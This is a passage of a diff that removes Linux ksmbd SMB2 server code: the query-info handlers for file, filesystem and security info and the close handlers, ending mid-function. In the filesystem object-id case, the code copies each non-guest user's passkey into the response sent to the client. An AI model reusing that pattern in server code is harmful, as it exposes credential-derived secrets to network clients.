+-	rsp->OutputBufferLength = cpu_to_le32(nbytes);
+-	inc_rfc1001_len(rsp_org, nbytes);
+-}
+-
+-static void get_file_internal_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_internal_info *file_info;
+-	struct kstat stat;
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-	file_info = (struct smb2_file_internal_info *)rsp->Buffer;
+-	file_info->IndexNumber = cpu_to_le64(stat.ino);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_internal_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_internal_info));
+-}
+-
+-static int get_file_network_open_info(struct smb2_query_info_rsp *rsp,
+-				      struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_ntwrk_info *file_info;
+-	struct inode *inode;
+-	struct kstat stat;
+-	u64 time;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	file_info = (struct smb2_file_ntwrk_info *)rsp->Buffer;
+-
+-	inode = file_inode(fp->filp);
+-	generic_fillattr(file_mnt_user_ns(fp->filp), inode, &stat);
+-
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(stat.atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.mtime);
+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(stat.ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->Attributes = fp->f_ci->m_fattr;
+-	file_info->AllocationSize =
+-		cpu_to_le64(inode->i_blocks << 9);
+-	file_info->EndOfFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
+-	file_info->Reserved = cpu_to_le32(0);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_ntwrk_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ntwrk_info));
+-	return 0;
+-}
+-
+-static void get_file_ea_info(struct smb2_query_info_rsp *rsp, void *rsp_org)
+-{
+-	struct smb2_file_ea_info *file_info;
+-
+-	file_info = (struct smb2_file_ea_info *)rsp->Buffer;
+-	file_info->EASize = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_ea_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_ea_info));
+-}
+-
+-static void get_file_position_info(struct smb2_query_info_rsp *rsp,
+-				   struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_pos_info *file_info;
+-
+-	file_info = (struct smb2_file_pos_info *)rsp->Buffer;
+-	file_info->CurrentByteOffset = cpu_to_le64(fp->filp->f_pos);
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_pos_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_pos_info));
+-}
+-
+-static void get_file_mode_info(struct smb2_query_info_rsp *rsp,
+-			       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_mode_info *file_info;
+-
+-	file_info = (struct smb2_file_mode_info *)rsp->Buffer;
+-	file_info->Mode = fp->coption & FILE_MODE_INFO_MASK;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_mode_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_mode_info));
+-}
+-
+-static void get_file_compression_info(struct smb2_query_info_rsp *rsp,
+-				      struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_comp_info *file_info;
+-	struct kstat stat;
+-
+-	generic_fillattr(file_mnt_user_ns(fp->filp), file_inode(fp->filp),
+-			 &stat);
+-
+-	file_info = (struct smb2_file_comp_info *)rsp->Buffer;
+-	file_info->CompressedFileSize = cpu_to_le64(stat.blocks << 9);
+-	file_info->CompressionFormat = COMPRESSION_FORMAT_NONE;
+-	file_info->CompressionUnitShift = 0;
+-	file_info->ChunkShift = 0;
+-	file_info->ClusterShift = 0;
+-	memset(&file_info->Reserved[0], 0, 3);
+-
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_comp_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_comp_info));
+-}
+-
+-static int get_file_attribute_tag_info(struct smb2_query_info_rsp *rsp,
+-				       struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb2_file_attr_tag_info *file_info;
+-
+-	if (!(fp->daccess & FILE_READ_ATTRIBUTES_LE)) {
+-		pr_err("no right to read the attributes : 0x%x\n",
+-		       fp->daccess);
+-		return -EACCES;
+-	}
+-
+-	file_info = (struct smb2_file_attr_tag_info *)rsp->Buffer;
+-	file_info->FileAttributes = fp->f_ci->m_fattr;
+-	file_info->ReparseTag = 0;
+-	rsp->OutputBufferLength =
+-		cpu_to_le32(sizeof(struct smb2_file_attr_tag_info));
+-	inc_rfc1001_len(rsp_org, sizeof(struct smb2_file_attr_tag_info));
+-	return 0;
+-}
+-
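+-/*
+- * Encode an smb311_posix_qinfo from the inode, followed by 32 bytes of
+- * owner and group sids. Returns the number of bytes written.
+- */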
+-static int find_file_posix_info(struct smb2_query_info_rsp *rsp,
+-				struct ksmbd_file *fp, void *rsp_org)
+-{
+-	struct smb311_posix_qinfo *file_info;
+-	struct inode *inode = file_inode(fp->filp);
+-	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-	u64 time;
+-	int out_buf_len = sizeof(struct smb311_posix_qinfo) + 32;
+-
+-	file_info = (struct smb311_posix_qinfo *)rsp->Buffer;
+-	file_info->CreationTime = cpu_to_le64(fp->create_time);
+-	time = ksmbd_UnixTimeToNT(inode->i_atime);
+-	file_info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(inode->i_mtime);
+-	file_info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(inode->i_ctime);
+-	file_info->ChangeTime = cpu_to_le64(time);
+-	file_info->DosAttributes = fp->f_ci->m_fattr;
+-	file_info->Inode = cpu_to_le64(inode->i_ino);
+-	file_info->EndOfFile = cpu_to_le64(inode->i_size);
+-	file_info->AllocationSize = cpu_to_le64(inode->i_blocks << 9);
+-	file_info->HardLinks = cpu_to_le32(inode->i_nlink);
+-	file_info->Mode = cpu_to_le32(inode->i_mode & 0777);
+-	file_info->DeviceId = cpu_to_le32(inode->i_rdev);
+-
+-	/*
+-	 * Sids(32) contains two sids (UNIX user sid(16), UNIX group sid(16)).
+-	 * UNIX sid(16) = revision(1) + num_subauth(1) + authority(6) +
+-	 *		  sub_auth(4 * 1(num_subauth)) + RID(4).
+-	 */
+-	id_to_sid(from_kuid_munged(&init_user_ns, vfsuid_into_kuid(vfsuid)),
+-		  SIDUNIX_USER, (struct smb_sid *)&file_info->Sids[0]);
+-	id_to_sid(from_kgid_munged(&init_user_ns, vfsgid_into_kgid(vfsgid)),
+-		  SIDUNIX_GROUP, (struct smb_sid *)&file_info->Sids[16]);
+-
+-	rsp->OutputBufferLength = cpu_to_le32(out_buf_len);
+-	inc_rfc1001_len(rsp_org, out_buf_len);
+-	return out_buf_len;
+-}
+-
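+-/**
+- * smb2_get_info_file() - handler for the per-file query info classes
+- * @work:	smb work containing query info command buffer
+- * @req:	query info request
+- * @rsp:	query info response
+- *
+- * Return:	0 on success, otherwise error
+- */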
+-static int smb2_get_info_file(struct ksmbd_work *work,
+-			      struct smb2_query_info_req *req,
+-			      struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_file *fp;
+-	int fileinfoclass = 0;
+-	int rc = 0;
+-	int file_infoclass_size;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		/* smb2 info file called for pipe */
+-		return smb2_get_info_file_pipe(work->sess, req, rsp,
+-					       work->response_buf);
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	fileinfoclass = req->FileInfoClass;
+-
+-	switch (fileinfoclass) {
+-	case FILE_ACCESS_INFORMATION:
+-		get_file_access_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ACCESS_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_BASIC_INFORMATION:
+-		rc = get_file_basic_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_BASIC_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_STANDARD_INFORMATION:
+-		get_file_standard_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STANDARD_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALIGNMENT_INFORMATION:
+-		get_file_alignment_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_ALIGNMENT_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALL_INFORMATION:
+-		rc = get_file_all_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALL_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ALTERNATE_NAME_INFORMATION:
+-		get_file_alternate_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ALTERNATE_NAME_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_STREAM_INFORMATION:
+-		get_file_stream_info(work, rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_STREAM_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_INTERNAL_INFORMATION:
+-		get_file_internal_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_INTERNAL_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_NETWORK_OPEN_INFORMATION:
+-		rc = get_file_network_open_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_NETWORK_OPEN_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_EA_INFORMATION:
+-		get_file_ea_info(rsp, work->response_buf);
+-		file_infoclass_size = FILE_EA_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_FULL_EA_INFORMATION:
+-		rc = smb2_get_ea(work, fp, req, rsp, work->response_buf);
+-		file_infoclass_size = FILE_FULL_EA_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_POSITION_INFORMATION:
+-		get_file_position_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_POSITION_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_MODE_INFORMATION:
+-		get_file_mode_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_MODE_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_COMPRESSION_INFORMATION:
+-		get_file_compression_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_COMPRESSION_INFORMATION_SIZE;
+-		break;
+-
+-	case FILE_ATTRIBUTE_TAG_INFORMATION:
+-		rc = get_file_attribute_tag_info(rsp, fp, work->response_buf);
+-		file_infoclass_size = FILE_ATTRIBUTE_TAG_INFORMATION_SIZE;
+-		break;
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		if (!work->tcon->posix_extensions) {
+-			pr_err("client doesn't negotiate with SMB3.1.1 POSIX Extensions\n");
+-			rc = -EOPNOTSUPP;
+-		} else {
+-			file_infoclass_size = find_file_posix_info(rsp, fp,
+-					work->response_buf);
+-		}
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "fileinfoclass %d not supported yet\n",
+-			    fileinfoclass);
+-		rc = -EOPNOTSUPP;
+-	}
+-	if (!rc)
+-		rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-				      rsp, work->response_buf,
+-				      file_infoclass_size);
+-	ksmbd_fd_put(work, fp);
+-	return rc;
+-}
+-
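+-/**
+- * smb2_get_info_filesystem() - handler for the filesystem info classes
+- * @work:	smb work containing query info command buffer
+- * @req:	query info request
+- * @rsp:	query info response
+- *
+- * Return:	0 on success, otherwise error
+- */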
+-static int smb2_get_info_filesystem(struct ksmbd_work *work,
+-				    struct smb2_query_info_req *req,
+-				    struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	int fsinfoclass = 0;
+-	struct kstatfs stfs;
+-	struct path path;
+-	int rc = 0, len;
+-	int fs_infoclass_size = 0;
+-
+-	if (!share->path)
+-		return -EIO;
+-
+-	rc = kern_path(share->path, LOOKUP_NO_SYMLINKS, &path);
+-	if (rc) {
+-		pr_err("cannot create vfs path\n");
+-		return -EIO;
+-	}
+-
+-	rc = vfs_statfs(&path, &stfs);
+-	if (rc) {
+-		pr_err("cannot do stat of path %s\n", share->path);
+-		path_put(&path);
+-		return -EIO;
+-	}
+-
+-	fsinfoclass = req->FileInfoClass;
+-
+-	switch (fsinfoclass) {
+-	case FS_DEVICE_INFORMATION:
+-	{
+-		struct filesystem_device_info *info;
+-
+-		info = (struct filesystem_device_info *)rsp->Buffer;
+-
+-		info->DeviceType = cpu_to_le32(stfs.f_type);
+-		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
+-		rsp->OutputBufferLength = cpu_to_le32(8);
+-		inc_rfc1001_len(work->response_buf, 8);
+-		fs_infoclass_size = FS_DEVICE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_ATTRIBUTE_INFORMATION:
+-	{
+-		struct filesystem_attribute_info *info;
+-		size_t sz;
+-
+-		info = (struct filesystem_attribute_info *)rsp->Buffer;
+-		info->Attributes = cpu_to_le32(FILE_SUPPORTS_OBJECT_IDS |
+-					       FILE_PERSISTENT_ACLS |
+-					       FILE_UNICODE_ON_DISK |
+-					       FILE_CASE_PRESERVED_NAMES |
+-					       FILE_CASE_SENSITIVE_SEARCH |
+-					       FILE_SUPPORTS_BLOCK_REFCOUNTING);
+-
+-		info->Attributes |= cpu_to_le32(server_conf.share_fake_fscaps);
+-
+-		if (test_share_config_flag(work->tcon->share_conf,
+-		    KSMBD_SHARE_FLAG_STREAMS))
+-			info->Attributes |= cpu_to_le32(FILE_NAMED_STREAMS);
+-
+-		info->MaxPathNameComponentLength = cpu_to_le32(stfs.f_namelen);
+-		len = smbConvertToUTF16((__le16 *)info->FileSystemName,
+-					"NTFS", PATH_MAX, conn->local_nls, 0);
+-		len = len * 2;
+-		info->FileSystemNameLen = cpu_to_le32(len);
+-		sz = sizeof(struct filesystem_attribute_info) - 2 + len;
+-		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_ATTRIBUTE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_VOLUME_INFORMATION:
+-	{
+-		struct filesystem_vol_info *info;
+-		size_t sz;
+-		unsigned int serial_crc = 0;
+-
+-		info = (struct filesystem_vol_info *)(rsp->Buffer);
+-		info->VolumeCreationTime = 0;
+-		serial_crc = crc32_le(serial_crc, share->name,
+-				      strlen(share->name));
+-		serial_crc = crc32_le(serial_crc, share->path,
+-				      strlen(share->path));
+-		serial_crc = crc32_le(serial_crc, ksmbd_netbios_name(),
+-				      strlen(ksmbd_netbios_name()));
+-		/* Take a dummy value for the serial number */
+-		info->SerialNumber = cpu_to_le32(serial_crc);
+-		len = smbConvertToUTF16((__le16 *)info->VolumeLabel,
+-					share->name, PATH_MAX,
+-					conn->local_nls, 0);
+-		len = len * 2;
+-		info->VolumeLabelSize = cpu_to_le32(len);
+-		info->Reserved = 0;
+-		sz = sizeof(struct filesystem_vol_info) - 2 + len;
+-		rsp->OutputBufferLength = cpu_to_le32(sz);
+-		inc_rfc1001_len(work->response_buf, sz);
+-		fs_infoclass_size = FS_VOLUME_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_SIZE_INFORMATION:
+-	{
+-		struct filesystem_info *info;
+-
+-		info = (struct filesystem_info *)(rsp->Buffer);
+-		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
+-		info->FreeAllocationUnits = cpu_to_le64(stfs.f_bfree);
+-		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+-		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+-		rsp->OutputBufferLength = cpu_to_le32(24);
+-		inc_rfc1001_len(work->response_buf, 24);
+-		fs_infoclass_size = FS_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_FULL_SIZE_INFORMATION:
+-	{
+-		struct smb2_fs_full_size_info *info;
+-
+-		info = (struct smb2_fs_full_size_info *)(rsp->Buffer);
+-		info->TotalAllocationUnits = cpu_to_le64(stfs.f_blocks);
+-		info->CallerAvailableAllocationUnits =
+-					cpu_to_le64(stfs.f_bavail);
+-		info->ActualAvailableAllocationUnits =
+-					cpu_to_le64(stfs.f_bfree);
+-		info->SectorsPerAllocationUnit = cpu_to_le32(1);
+-		info->BytesPerSector = cpu_to_le32(stfs.f_bsize);
+-		rsp->OutputBufferLength = cpu_to_le32(32);
+-		inc_rfc1001_len(work->response_buf, 32);
+-		fs_infoclass_size = FS_FULL_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_OBJECT_ID_INFORMATION:
+-	{
+-		struct object_id_info *info;
+-
+-		info = (struct object_id_info *)(rsp->Buffer);
+-
+-		if (!user_guest(sess->user))
+-			memcpy(info->objid, user_passkey(sess->user), 16);
+-		else
+-			memset(info->objid, 0, 16);
+-
+-		info->extended_info.magic = cpu_to_le32(EXTENDED_INFO_MAGIC);
+-		info->extended_info.version = cpu_to_le32(1);
+-		info->extended_info.release = cpu_to_le32(1);
+-		info->extended_info.rel_date = 0;
+-		memcpy(info->extended_info.version_string, "1.1.0", strlen("1.1.0"));
+-		rsp->OutputBufferLength = cpu_to_le32(64);
+-		inc_rfc1001_len(work->response_buf, 64);
+-		fs_infoclass_size = FS_OBJECT_ID_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_SECTOR_SIZE_INFORMATION:
+-	{
+-		struct smb3_fs_ss_info *info;
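+-		/* Report the filesystem block size as the sector size, capped at 4096 bytes */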
+-		unsigned int sector_size =
+-			min_t(unsigned int, path.mnt->mnt_sb->s_blocksize, 4096);
+-
+-		info = (struct smb3_fs_ss_info *)(rsp->Buffer);
+-
+-		info->LogicalBytesPerSector = cpu_to_le32(sector_size);
+-		info->PhysicalBytesPerSectorForAtomicity =
+-				cpu_to_le32(sector_size);
+-		info->PhysicalBytesPerSectorForPerf = cpu_to_le32(sector_size);
+-		info->FSEffPhysicalBytesPerSectorForAtomicity =
+-				cpu_to_le32(sector_size);
+-		info->Flags = cpu_to_le32(SSINFO_FLAGS_ALIGNED_DEVICE |
+-				    SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE);
+-		info->ByteOffsetForSectorAlignment = 0;
+-		info->ByteOffsetForPartitionAlignment = 0;
+-		rsp->OutputBufferLength = cpu_to_le32(28);
+-		inc_rfc1001_len(work->response_buf, 28);
+-		fs_infoclass_size = FS_SECTOR_SIZE_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_CONTROL_INFORMATION:
+-	{
+-		/*
+-		 * TODO: The current implementation is based on test
+-		 * results against a win7 (NTFS) server. It needs to be
+-		 * modified to fetch valid quota values from the
+-		 * Linux kernel.
+-		 */
+-		struct smb2_fs_control_info *info;
+-
+-		info = (struct smb2_fs_control_info *)(rsp->Buffer);
+-		info->FreeSpaceStartFiltering = 0;
+-		info->FreeSpaceThreshold = 0;
+-		info->FreeSpaceStopFiltering = 0;
+-		info->DefaultQuotaThreshold = cpu_to_le64(SMB2_NO_FID);
+-		info->DefaultQuotaLimit = cpu_to_le64(SMB2_NO_FID);
+-		info->Padding = 0;
+-		rsp->OutputBufferLength = cpu_to_le32(48);
+-		inc_rfc1001_len(work->response_buf, 48);
+-		fs_infoclass_size = FS_CONTROL_INFORMATION_SIZE;
+-		break;
+-	}
+-	case FS_POSIX_INFORMATION:
+-	{
+-		struct filesystem_posix_info *info;
+-
+-		if (!work->tcon->posix_extensions) {
+-			pr_err("client did not negotiate SMB3.1.1 POSIX extensions\n");
+-			rc = -EOPNOTSUPP;
+-		} else {
+-			info = (struct filesystem_posix_info *)(rsp->Buffer);
+-			info->OptimalTransferSize = cpu_to_le32(stfs.f_bsize);
+-			info->BlockSize = cpu_to_le32(stfs.f_bsize);
+-			info->TotalBlocks = cpu_to_le64(stfs.f_blocks);
+-			info->BlocksAvail = cpu_to_le64(stfs.f_bfree);
+-			info->UserBlocksAvail = cpu_to_le64(stfs.f_bavail);
+-			info->TotalFileNodes = cpu_to_le64(stfs.f_files);
+-			info->FreeFileNodes = cpu_to_le64(stfs.f_ffree);
+-			rsp->OutputBufferLength = cpu_to_le32(56);
+-			inc_rfc1001_len(work->response_buf, 56);
+-			fs_infoclass_size = FS_POSIX_INFORMATION_SIZE;
+-		}
+-		break;
+-	}
+-	default:
+-		path_put(&path);
+-		return -EOPNOTSUPP;
+-	}
+-	rc = buffer_check_err(le32_to_cpu(req->OutputBufferLength),
+-			      rsp, work->response_buf,
+-			      fs_infoclass_size);
+-	path_put(&path);
+-	return rc;
+-}
+-
+-static int smb2_get_info_sec(struct ksmbd_work *work,
+-			     struct smb2_query_info_req *req,
+-			     struct smb2_query_info_rsp *rsp)
+-{
+-	struct ksmbd_file *fp;
+-	struct user_namespace *user_ns;
+-	struct smb_ntsd *pntsd = (struct smb_ntsd *)rsp->Buffer, *ppntsd = NULL;
+-	struct smb_fattr fattr = {{0}};
+-	struct inode *inode;
+-	__u32 secdesclen = 0;
+-	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
+-	int addition_info = le32_to_cpu(req->AdditionalInformation);
+-	int rc = 0, ppntsd_size = 0;
+-
+-	if (addition_info & ~(OWNER_SECINFO | GROUP_SECINFO | DACL_SECINFO |
+-			      PROTECTED_DACL_SECINFO |
+-			      UNPROTECTED_DACL_SECINFO)) {
+-		ksmbd_debug(SMB, "Unsupported additional info: 0x%x\n",
+-		       addition_info);
+-
+-		pntsd->revision = cpu_to_le16(1);
+-		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PROTECTED);
+-		pntsd->osidoffset = 0;
+-		pntsd->gsidoffset = 0;
+-		pntsd->sacloffset = 0;
+-		pntsd->dacloffset = 0;
+-
+-		secdesclen = sizeof(struct smb_ntsd);
+-		rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-		inc_rfc1001_len(work->response_buf, secdesclen);
+-
+-		return 0;
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off) {
+-		if (!has_file_id(req->VolatileFileId)) {
+-			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
+-				    work->compound_fid);
+-			id = work->compound_fid;
+-			pid = work->compound_pfid;
+-		}
+-	}
+-
+-	if (!has_file_id(id)) {
+-		id = req->VolatileFileId;
+-		pid = req->PersistentFileId;
+-	}
+-
+-	fp = ksmbd_lookup_fd_slow(work, id, pid);
+-	if (!fp)
+-		return -ENOENT;
+-
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	inode = file_inode(fp->filp);
+-	ksmbd_acls_fattr(&fattr, user_ns, inode);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_ACL_XATTR))
+-		ppntsd_size = ksmbd_vfs_get_sd_xattr(work->conn, user_ns,
+-						     fp->filp->f_path.dentry,
+-						     &ppntsd);
+-
+-	/* Check if sd buffer size exceeds response buffer size */
+-	if (smb2_resp_buf_len(work, 8) > ppntsd_size)
+-		rc = build_sec_desc(user_ns, pntsd, ppntsd, ppntsd_size,
+-				    addition_info, &secdesclen, &fattr);
+-	posix_acl_release(fattr.cf_acls);
+-	posix_acl_release(fattr.cf_dacls);
+-	kfree(ppntsd);
+-	ksmbd_fd_put(work, fp);
+-	if (rc)
+-		return rc;
+-
+-	rsp->OutputBufferLength = cpu_to_le32(secdesclen);
+-	inc_rfc1001_len(work->response_buf, secdesclen);
+-	return 0;
+-}
+-
+-/**
+- * smb2_query_info() - handler for smb2 query info command
+- * @work:	smb work containing query info request buffer
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int smb2_query_info(struct ksmbd_work *work)
+-{
+-	struct smb2_query_info_req *req;
+-	struct smb2_query_info_rsp *rsp;
+-	int rc = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	ksmbd_debug(SMB, "GOT query info request\n");
+-
+-	switch (req->InfoType) {
+-	case SMB2_O_INFO_FILE:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILE\n");
+-		rc = smb2_get_info_file(work, req, rsp);
+-		break;
+-	case SMB2_O_INFO_FILESYSTEM:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_FILESYSTEM\n");
+-		rc = smb2_get_info_filesystem(work, req, rsp);
+-		break;
+-	case SMB2_O_INFO_SECURITY:
+-		ksmbd_debug(SMB, "GOT SMB2_O_INFO_SECURITY\n");
+-		rc = smb2_get_info_sec(work, req, rsp);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "InfoType %d not supported yet\n",
+-			    req->InfoType);
+-		rc = -EOPNOTSUPP;
+-	}
+-
+-	if (rc < 0) {
+-		if (rc == -EACCES)
+-			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		else if (rc == -ENOENT)
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-		else if (rc == -EIO)
+-			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
+-		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
+-			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+-		smb2_set_err_rsp(work);
+-
+-		ksmbd_debug(SMB, "error while processing smb2 query rc = %d\n",
+-			    rc);
+-		return rc;
+-	}
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->OutputBufferOffset = cpu_to_le16(72);
+-	inc_rfc1001_len(work->response_buf, 8);
+-	return 0;
+-}
+-
+-/**
+- * smb2_close_pipe() - handler for closing IPC pipe
+- * @work:	smb work containing close request buffer
+- *
+- * Return:	0
+- */
+-static noinline int smb2_close_pipe(struct ksmbd_work *work)
+-{
+-	u64 id;
+-	struct smb2_close_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_close_rsp *rsp = smb2_get_msg(work->response_buf);
+-
+-	id = req->VolatileFileId;
+-	ksmbd_session_rpc_close(work->sess, id);
+-
+-	rsp->StructureSize = cpu_to_le16(60);
+-	rsp->Flags = 0;
+-	rsp->Reserved = 0;
+-	rsp->CreationTime = 0;
+-	rsp->LastAccessTime = 0;
+-	rsp->LastWriteTime = 0;
+-	rsp->ChangeTime = 0;
+-	rsp->AllocationSize = 0;
+-	rsp->EndOfFile = 0;
+-	rsp->Attributes = 0;
+-	inc_rfc1001_len(work->response_buf, 60);
+-	return 0;
+-}
+-
+-/**
+- * smb2_close() - handler for smb2 close file command
+- * @work:	smb work containing close request buffer
+- *
+- * Return:	0
+- */
+-int smb2_close(struct ksmbd_work *work)
+-{
+-	u64 volatile_id = KSMBD_NO_FID;
+-	u64 sess_id;
+-	struct smb2_close_req *req;
+-	struct smb2_close_rsp *rsp;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_file *fp;
+-	struct inode *inode;
+-	u64 time;
+-	int err = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe close request\n");
+-		return smb2_close_pipe(work);
+-	}
+-
+-	sess_id = le64_to_cpu(req->hdr.SessionId);
+-	if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
+-		sess_id = work->compound_sid;
+-
+-	work->compound_sid = 0;
+-	if (check_session_id(conn, sess_id)) {
+-		work->compound_sid = sess_id;
+-	} else {
+-		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
+-		if (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)
+-			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		err = -EBADF;
+-		goto out;
+-	}
+-
+-	if (work->next_smb2_rcv_hdr_off &&
+-	    !has_file_id(req->VolatileFileId)) {
+-		if (!has_file_id(work->compound_fid)) {
+-			/* file already closed, return FILE_CLOSED */
+-			ksmbd_debug(SMB, "file already closed\n");
+-			rsp->hdr.Status = STATUS_FILE_CLOSED;
+-			err = -EBADF;
+-			goto out;
+-		} else {
+-			ksmbd_debug(SMB,
+-				    "Compound request set FID = %llu:%llu\n",
+-				    work->compound_fid,
+-				    work->compound_pfid);
+-			volatile_id = work->compound_fid;
+-
+-			/* file closed, stored id is not valid anymore */
+-			work->compound_fid = KSMBD_NO_FID;
+-			work->compound_pfid = KSMBD_NO_FID;
+-		}
+-	} else {
+-		volatile_id = req->VolatileFileId;
+-	}
+-	ksmbd_debug(SMB, "volatile_id = %llu\n", volatile_id);
+-
+-	rsp->StructureSize = cpu_to_le16(60);
+-	rsp->Reserved = 0;
+-
